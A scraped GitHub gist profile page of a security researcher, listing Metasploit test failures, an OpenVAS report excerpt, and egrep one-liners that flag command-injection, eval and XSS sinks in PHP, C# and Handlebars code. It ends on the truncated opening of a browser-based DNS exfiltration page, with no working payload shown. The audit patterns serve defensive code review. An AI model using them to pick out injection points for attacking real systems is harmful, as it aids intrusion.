Skip to content

Instantly share code, notes, and snippets.

View nstarke's full-sized avatar

Nicholas Starke nstarke

View GitHub Profile
View ms-rspec-failures
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsbe, fmt=elf
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsle, fmt=elf
rspec ./spec/lib/rex/socket/range_walker_spec.rb:29 # with an invalid hostname should not be valid
rspec ./spec/lib/rex/socket/range_walker_spec.rb:34 # with an invalid hostname and CIDR should not be valid
Failure/Error: verify_bin_fingerprint(format_hash, bin)
expected: /ELF 32-bit MSB executable, MIPS/
got: "/dev/stdin: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size\n" (using =~)
@@ -1,2 +1,2 @@
nstarke / gist:11306563
Last active August 29, 2015 14:00
View gist:11306563
--- ../Gemfile.lock 2014-04-25 21:35:15.353280736 +0000
+++ Gemfile.lock 2014-04-25 23:05:47.249280736 +0000
@@ -1,27 +1,27 @@
- activemodel (3.2.14)
- activesupport (= 3.2.14)
+ activemodel (3.2.17)
+ activesupport (= 3.2.17)
nstarke / gist:aabe781c6967a7f03adb
Created January 12, 2015 01:50
View gist:aabe781c6967a7f03adb
msf > openvas_report_import 1 11
[*] Importing report to database.
[-] Error while running command openvas_report_import: getaddrinfo: Name or service not known
Call stack:
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `gethostbyname'
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `getaddresses'
/home/nick/metasploit-framework/lib/rex/socket.rb:165:in `getaddress'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:93:in `normalize_host'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:160:in `block in report_host'
View openvas-report
<report content_type='text/xml' extension='xml' format_id='a994b278-1f62-11e1-96ac-406186ea4fc5' id='7fa042b4-55ee-4ece-a647-7f2288e24b5c' type='scan'><owner><name/></owner><name>2015-01-12T01:24:46Z</name><comment/><creation_time>2015-01-12T01:24:46Z</creation_time><modification_time>2015-01-12T01:32:42Z</modification_time><writable>0</writable><in_use>0</in_use><report id='7fa042b4-55ee-4ece-a647-7f2288e24b5c'><report_format/><sort><field>type<order>descending</order></field></sort><filters id='0'><term>sort-reverse=ROWID result_hosts_only=1 min_cvss_base= levels=hmlgd autofp=0 notes=0 overrides=0 first=1 rows=-1 delta_states=cgns</term>hmlgd<phrase/><autofp>0</autofp><notes>0</notes><overrides>0</overrides><apply_overrides>0</apply_overrides><result_hosts_only>1</result_hosts_only><min_cvss_base/><filter>High</filter><filter>Medium</filter><filter>Low</filter><filter>Log</filter><filter>Debug</filter></filters><severity_class id='d4c74cda-89e1-11e3-9c29-406186ea4fc5'><name>nist</name><full_name>NVD Vulnera
nstarke /
Last active August 29, 2015 14:25
EmberJS one-liner to find unsafe handlebars parameters
# searches for {{{ or }}} in all .handlebars or .hbs files
# {{{ and }}} signify unsafe template parameters in EmberJS
# tested on OS X 10.10
egrep -r --include "*.handlebars" --include "*.hbs" "\{\{\{|\}\}\}" .
nstarke / html5-elements.json
Created August 9, 2015 23:12
List of all HTML5 elements structured in a JSON document
View html5-elements.json
"name": "a",
"start": "<a>",
"end": "</a>"
"name": "abbr",
"start": "<abbr>",
"end": "</abbr>"
nstarke /
Last active December 5, 2015 17:39
Egrep commands to find security vulnerabilities and perform security audits on CSharp code. Useful for penetration testers operating in a Microsoft / CSharp environment.
# Returns instances where anti xss measures are deployed
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html.Encode)" .
# Returns possible command injection areas
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" .
# Returns possible xss scenarios (string concatention in HTML/XML)
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" .
# Returns places where anti csrf measure are deployed
nstarke /
Created February 27, 2016 18:16
C and C++ Egrep
# see all character arrays of any hardcoded length
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9]+\[\d+\]' .
nstarke /
Last active October 4, 2016 22:15
PHP Vulnerability egrep
# this command searches all PHP files in a directory for vulnerable shell functions
egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" .
# this command searches all PHP files in a directory for certain vulnerable php execution functions
egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" .
# this command returns instances where variables are echoed out without htmlspecialchars()
# it can be useful for finding XSS vulnerabilities in PHP code
egrep -r --include "*.php" -e "echo\s*\\$.*;" .
nstarke / bacon-ipsum.html
Last active January 14, 2017 03:48
Browser Based DNS Exfil
View bacon-ipsum.html
<!DOCTYPE html>
<html style="width:100%;height:100%;">
var targetId = Math.round(Math.random() * 1000000);
var sessionId = guid();
function doRequest(){